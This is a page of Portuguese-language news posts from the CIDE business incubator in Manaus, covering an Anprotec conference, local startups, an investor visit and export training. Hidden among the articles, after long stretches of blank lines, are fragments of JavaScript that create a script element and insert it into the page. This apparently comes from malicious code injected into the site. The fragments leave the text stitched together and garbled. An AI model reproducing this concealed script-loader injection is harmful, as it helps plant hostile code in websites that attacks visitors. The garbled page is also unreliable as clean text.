CIDE participa da 26ª Conferência da Anprotec

Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas.
Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas

 

 

A 26ª Conferência Anprotec reuniu cerca de 650 empreendedores, representantes de incubadoras de empreas, gestores de ambientes de inovação, representantes do governo e do setor privado, estudantes e especialistas de todos os Estados brasileiros e de outros países em Fortaleza (CE). Durante três dias, de 17 a 20 de outubro, os participantes assistiram plenárias, minicursos, realizaram networking e interagiram no 4º Fórum Sebrae de Inovação. O Centro de Incubação e Desenvolvimento Empresarial (CIDE) foi representado por Rosália Padilha.

 

Negócios de impacto social ganharam espaço nas discussões. “Dentro desse contexto a Conferência foi bem aproveitada, assim como a rede de relacionamentos, contatos com reciprocidade de outras incubadoras e parques tecnológicos”, diz a representante do CIDE.

 

Além de participar de cursos e Workshops de sistemas de inovação, os representantes de incubadoras realizaram visitas técnicas a parques tecnológicos do Ceará. “Essas iniciativas tratadas por especialistas experientes, abordando temas relevantes no ambiente empresarial e inovador estimulará a reflexão e maior conhecimento para os desafios do nosso cotidiano, sejam nas incubadoras, universidades, parques tecnológicos, ICTs, empresas e entidades atuantes em inovação”, finaliza Rosália.

Goiânia é eleita

O terceiro dia de atividades da 26ª Conferência Anprotec em Fortaleza (CE) foi finalizado com a assembleia geral da Associação. A atividade teve início com a apresentação das candidaturas que concorreram para sediar a Conferência de 2018. Tanto a equipe de Goiânia (GO), quanto a de Gramado (RS) tiveram 10 minutos para argumentar a favor de suas cidades. Após as explanações, o presidente da Anprotec, Jorge Audy, convidou todos os participantes para votarem em uma das duas candidaturas.

 

A cidade vencedora foi Goiânia, que abrigará a 28ª Conferência Anprotec em 2018. Após as comemorações, Aline Figliolo, Superintendente de Tecnologia e Inovação da Secretaria de Ciência e Tecnologia de Goiânia, afirmou que a Conferência de 2018 será muito agregadora regionalmente. “Este é um evento de todo centro oeste e de todo o Brasil”.

Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram
Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram

 

 

 

Representante do CIDE, Rosália Padilha, conheceu incubadoras e interagiu com empresariado em Fortaleza
Representante do CIDE, Rosália Padilha, conheceu e interagiu com empresariado de outras incubadoras em Fortaleza

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

var d=document;var s=d.createElement(‘script’);

O lado humano da Tecnologia da Informação

A AXM atua no segmento de Desenvolvimento de Sistemas
A AXM atua no segmento de Desenvolvimento de Sistemas

 

A AXM, do segmento de Tecnologia da Informação e associada ao Centro de Incubação e Desenvolvimento Empresarial (CIDE), é um excelente exemplo de empresa que estende uma mão aos jovens empreendedores de Startups; se preocupa com a formação de novos profissionais, dando consultoria e treinamentos, e com os descartes de máquinas leitoras de cartão de crédito, oferecendo opções de troca por modelos mais modernos.

 

Segundo a proprietária e administradora de empresas, Adriana Ximenes, as oportunidades e os conhecimentos das demandas das firmas multinacionais do Polo Industrial de Manaus a levaram a constituir a própria empresa. “Eu sempre trabalhei na área industrial. Depois de muito tempo, analisando perfis de consultores e de outros profissionais da área, eu decidi abrir minha própria empresa em 2009, prestando serviços de treinamentos sobre Lei de Informática para empresas e instituições”, conta.

 

Ainda conforme Ximenes, em 2015, a AXM viu a oportunidade de atuar na área de Desenvolvimento de Sistemas. “Começamos a desenvolver projetos e produtos inovadores na área de Tecnologia da Informação e Automação Comercial em parceria com empresas e o Cide. Para nós, foi um ano muito próspero”, diz a administradora de empresas.

 

Reuso do equipamento

Em tempos de fazer economia e busca da eficiência no desenvolvimento dos trabalhos, a AXM desenvolveu em parceria com outra empresa, um projeto de rastreamento de equipamentos leitores de cartão, as conhecidas máquinas de cartão de crédito.

 

“Hoje em dia, a tecnologia presente nessas máquinas de cartão está em constante mudança para melhor. Então, é necessário a atualização das máquinas leitoras e, portanto, a substituição do aparelho. Para que elas não sejam jogadas em lixo comum, nós desenvolvemos uma plataforma em que o fabricante das máquinas recolhe esses produtos, dando condições para que o usuário, o comerciante possa adquirir uma máquina nova e atualizada”, explica Ximenes.

Para saber mais: www.axmconsultoria.com e redes sociais

A proprietária de AXM, Adriana Ximenes, e funcionários de multinacionais
A proprietária de AXM, Adriana Ximenes, e funcionários de multinacionais

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Investimentos para empreendedores do CIDE

O representante da INSEED Investimentos, Euler Guimarães fala para empreendedores e convidados.
O representante da INSEED Investimentos, Euler Guimarães fala para empreendedores e convidados.

 

 

A Inseed Investimentos por meio do seu representante para a Região Norte, Euler Guimarães, apresentou, na tarde dessa terça-feira, 5, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), novas possibilidades de financiamentos em produtos considerados inovadores.

 

O evento contou com as presenças de empreendedores e do diretor executivo da incubadora. “O investimento para cada empreendedor vai ser avaliado individualmente de acordo com o produto de cada empresa. O que buscamos é que sejam negócios que possam ser acelerados e possam crescer, e dentro e fora do CIDE há muitas empresas que atendem esse perfil e podem receber esse investimento”, diz Guimarães.

 

Para o diretor executivo José Barbosa Grosso, a proposta do agente da Inseed Investimentos significou um incentivo aos empresários instalados na incubadora. “A reunião superou as expectativas. Alguns empresários não possuem recursos suficientes para levar adiante sua ideia de forma rápida. Então a ajuda de um investidor é importante para acelerar o processo de desenvolvimento de um produto, por exemplo”, finaliza.

 

Inseed Investimentos

Somos uma gestora de recursos focada em inovação. Acreditamos no empreendedorismo e inovação como alavancas de geração de riqueza para a sociedade.

 

A partir de vivência empreendedora própria, descobrimos oportunidades inovadoras, com alto potencial de crescimento e atuamos junto às equipes das investidas. Investimos nestes negócios nascentes de base tecnológica e multiplicamos valor para empreendedores, investidores e sociedade.

O diretor executivo do CIDE, José Grosso (à dir.), acompanha a apresentação.
O diretor executivo do CIDE, José Grosso (à dir.), acompanha a apresentação.

 

 

Empreendedores instalados no CIDE conhecem a proposta.
Empreendedores instalados no CIDE conhecem a proposta.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

A arte de fazer perfumes no CIDE

O casal de perfumistas, Elton e Irlanda, já estão instalados no Cide.
O casal de perfumistas, Elton e Irlanda, já estão instalados no Cide.

 

 

A prática da composição de perfumes está para o olfato assim como a arte da culinária está para o paladar, ou a arte da música, para os ouvidos.

A palavra perfume deriva do latim “per fumum”, que significa através do fumo. Com origem no Egito, o perfume surgiu da necessidade de aromatizar o corpo humano e objetos por maior tempo. Além do Egito, a arte da perfumaria também existiu na Índia, onde foi utilizada e aperfeiçoada pelos persas e romanos.

A moda do perfume surgiu na época do Renascimento, na Itália, e a partir disso, a indústria da perfumaria só continuou a crescer. Sendo considerada uma das indústrias que mais cresce no mundo, atualmente. Porém foi na França, em meados do século XIV, que a perfumaria teve seu maior avanço. O país tornou-se o maior centro de pesquisas e desenvolvimento de perfumes e possui as marcas mais importantes do mundo.

Vendo um mercado em ascensão e uma demanda cada vez mais crescente em Manaus, o casal Elton de França e Irlanda Sena, decidiram explorar o setor da Perfumaria, não somente comercializando os perfumes, mas vendendo essências da Amazônia, embalagens e dando formação sobre perfumaria.

“Em 1994 eu vi a necessidade de aumentar minha renda e comecei a fazer estudos na área de Cosméticos e Perfumaria, e comecei a fabricar perfumes para uso próprio, para colegas e conhecidos, no Rio de Janeiro”, conta o proprietário Elton de França, da Loja das Essências-Perfume da Amazônia, empresa que prepara a sua instalação, ainda este semestre, no Centro de Incubação e Desenvolvimento Empresarial (CIDE).

O perfumista Elton de França era militar e com a transferência, em 1996, para Manaus, continuou apaixonado pela área de Perfumaria. “Em Manaus, eu percebi que as pessoas gostavam de se perfumar e usar produtos bons de perfumaria. Então eu comecei a me interessar pelas essências dos perfumes. E andando pela cidade, conheci a minha esposa em uma loja em que vendia essências para perfumes”, relembra.

A loja de essências em que trabalhava Irlanda Sena fechou. Diante disso, Elton convidou a sua futura esposa a empreender na área de Perfumaria. “Já tínhamos conhecimentos suficientes para abrir nosso próprio negócio e assim o fizemos”, diz.

A decisão de ir ao Cide

Os perfumistas, Elton e Irlanda, querem ir mais longe e ampliar o negócio da Perfumaria Amazônica, realizar parcerias e participar de feiras nacionais e internacionais. “Decidimos ir ao CIDE devido à necessidade de ter um apoio técnico, mais formação e informação, para aumentar nossa empresa”, diz Elton

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Pequenos empresários aprendem como exportar

Pequenos empresários ouvem palestra de auditor fiscal no Sebrae-AM
Pequenos empresários ouvem palestra de auditor fiscal no Sebrae-AM

 

 

O Comitê Gestor e de Divulgação do Plano Nacional de Cultura Exportadora (PNCE) realizou, na última terça-feira, 12, no Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (Sebrae/Amazonas), a formação “Habilitação ao Siscomex”, para explicar aos pequenos empresários os procedimentos necessários sobre exportações de produtos.

 

A atividade contou com a participação dos empreendedores instalados no Centro de Incubação e Desenvolvimento Empresarial (CIDE), que conheceram o PNCE, na própria incubadora, depois de uma visita do comitê regional.

 

A formação foi dirigida pelo auditor fiscal da Receita Federal, Fabrício Magalhães, quem apresentou os modelos de documentos exigidos, os casos de exportações e tirou as dúvidas dos participantes. “Esse tipo de iniciativa é muito importante porque o potencial de exportação dos micros e pequenos empresários locais é enorme. Portanto, vamos dar orientações a eles de como realizar de forma legal as exportações de seus produtos”, diz.

SISCOMEX

Significa Sistema Integrado de Comércio Exterior. Foi instituído pelo Decreto 660/92, como sendo um instrumento administrativo que centraliza e/ou consolida as atividades de registro, acompanhamento e controle informatizado das operações de comércio exterior, tanto nas exportações quanto nas importações.

Palestra faz parte das atividades do PNCE
Palestra faz parte das atividades do PNCE

 

 

Empreendedores do CIDE conhecem o PNCE, na incubadora e decidem participar
Empreendedores do CIDE conhecem o PNCE, na incubadora e decidem participar

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}